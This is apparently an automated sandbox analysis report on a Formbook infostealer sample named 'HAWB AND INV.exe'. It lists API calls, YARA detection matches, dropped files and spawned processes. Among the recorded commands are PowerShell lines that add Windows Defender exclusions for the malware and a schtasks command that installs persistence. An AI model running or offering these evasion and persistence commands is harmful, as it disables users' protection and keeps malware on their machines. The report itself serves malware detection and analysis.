          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219540 NtReadFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_012195D0 NtClose,LdrInitializeThunk
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_012197A0 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_012196E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219950 NtQueueApcThread
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_012199D0 NtCreateProcessEx
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219820 NtEnumerateKey
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_0121B040 NtSuspendThread
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_012198A0 NtWriteVirtualMemory
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219B00 NtSetValueKey
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_0121A3B0 NtGetContextThread
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219A10 NtQuerySection
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219A80 NtOpenDirectoryObject
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219520 NtWaitForSingleObject
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_0121AD30 NtSetContextThread
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219560 NtWriteFile
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_012195F0 NtQueryInformationFile
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219730 NtQueryVirtualMemory
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_0121A710 NtOpenProcessToken
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219760 NtOpenProcess
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_0121A770 NtOpenThread
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219770 NtSetInformationFile
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219610 NtEnumerateValueKey
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219670 NtQueryInformationProcess
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_01219650 NtQueryValueKey
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_012196D0 NtCreateKey
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B199A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B196E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B196D0 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B195D0 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19540 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19A20 NtResumeThread
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19A10 NtQuerySection
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B1A3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B198A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B198F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B1B040 NtSuspendThread
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B199D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19660 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19650 NtQueryValueKey
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B197A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B1A710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B1A770 NtOpenThread
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19760 NtOpenProcess
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B195F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B1AD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B19560 NtWriteFile
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_001281B0 NtCreateFile
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_00128260 NtReadFile
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_001282E0 NtClose
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_001281AA NtCreateFile
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_0012825A NtReadFile
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: String function: 02ADB150 appears 35 times
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: String function: 011DB150 appears 35 times
          Source: HAWB AND INV.exe | Binary or memory string: OriginalFilename vs HAWB AND INV.exe
          Source: HAWB AND INV.exe, 00000000.00000002.364582224.000000000BE40000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs HAWB AND INV.exe
          Source: HAWB AND INV.exe, 00000000.00000002.364582224.000000000BE40000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs HAWB AND INV.exe
          Source: HAWB AND INV.exe, 00000000.00000002.363402350.00000000060D0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameDSASignature.dll@ vs HAWB AND INV.exe
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameSimpleUI.dll( vs HAWB AND INV.exe
          Source: HAWB AND INV.exe, 00000000.00000002.363989831.000000000BD40000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs HAWB AND INV.exe
          Source: HAWB AND INV.exe, 0000000A.00000002.485481654.0000000003107000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameipconfig.exej% vs HAWB AND INV.exe
          Source: HAWB AND INV.exe, 0000000A.00000002.479054770.00000000012CF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs HAWB AND INV.exe
          Source: HAWB AND INV.exe | Binary or memory string: OriginalFilenameTOKENPRIMARYGROUP.exe6 vs HAWB AND INV.exe
          Source: HAWB AND INV.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.HAWB AND INV.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.HAWB AND INV.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.HAWB AND INV.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.HAWB AND INV.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.HAWB AND INV.exe.3d81880.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.HAWB AND INV.exe.3d81880.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: HAWB AND INV.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: qxnptkmQbHB.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@16/19@9/4
          Source: C:\Users\user\Desktop\HAWB AND INV.exeFile created: C:\Users\user\AppData\Roaming\qxnptkmQbHB.exeJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6948:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4756:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:120:WilError_01
          Source: C:\Users\user\Desktop\HAWB AND INV.exeFile created: C:\Users\user\AppData\Local\Temp\tmp9D41.tmpJump to behavior
          Source: HAWB AND INV.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\HAWB AND INV.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\HAWB AND INV.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp | Binary or memory string: Select * from Clientes WHERE id=@id;;
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp | Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp | Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: HAWB AND INV.exe | ReversingLabs: Detection: 21%
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | File read: C:\Users\user\Desktop\HAWB AND INV.exe
          Source: unknown | Process created: C:\Users\user\Desktop\HAWB AND INV.exe 'C:\Users\user\Desktop\HAWB AND INV.exe'
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HAWB AND INV.exe'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp'
          Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Process created: C:\Users\user\Desktop\HAWB AND INV.exe C:\Users\user\Desktop\HAWB AND INV.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: HAWB AND INV.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: HAWB AND INV.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: ipconfig.pdb source: HAWB AND INV.exe, 0000000A.00000002.485361222.0000000003100000.00000040.00000001.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: HAWB AND INV.exe, 0000000A.00000002.485361222.0000000003100000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000B.00000000.426929861.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: HAWB AND INV.exe, 0000000A.00000002.479054770.00000000012CF000.00000040.00000001.sdmp, ipconfig.exe, 00000017.00000003.473141653.00000000008F0000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: HAWB AND INV.exe, ipconfig.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000B.00000000.426929861.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 0_2_009794E5 push cs; iretd 0_2_009794E6
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 0_2_05838AB8 pushad ; ret 0_2_05838ABC
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 0_2_05838AC2 pushad ; ret 0_2_05838AC3
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_0041B3B5 push eax; ret 10_2_0041B408
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_0041B46C push eax; ret 10_2_0041B472
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_0041B402 push eax; ret 10_2_0041B408
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_0041B40B push eax; ret 10_2_0041B472
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_0041B584 push edi; ret 10_2_0041BBBA
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_00415611 pushfd ; iretd 10_2_00415612
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_00415EB3 push edx; retf 10_2_00415ECE
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_00415FB3 push esi; ret 10_2_00415FBA
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_007594E5 push cs; iretd 10_2_007594E6
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Code function: 10_2_0122D0D1 push ecx; ret 10_2_0122D0E4
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_02B2D0D1 push ecx; ret 23_2_02B2D0E4
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_0012B3B5 push eax; ret 23_2_0012B408
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_0012B402 push eax; ret 23_2_0012B408
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_0012B40B push eax; ret 23_2_0012B472
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_0012B46C push eax; ret 23_2_0012B472
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_0012B584 push edi; ret 23_2_0012BBBA
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_00125611 pushfd ; iretd 23_2_00125612
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_00125EB3 push edx; retf 23_2_00125ECE
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 23_2_00125FB3 push esi; ret 23_2_00125FBA
          Source: initial sample | Static PE information: section name: .text entropy: 7.93407065965

          Persistence and Installation Behavior:

          Uses ipconfig to lookup or modify the Windows network settings
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | File created: C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe

          Boot Survival:

          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\Users\user\Desktop\HAWB AND INV.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
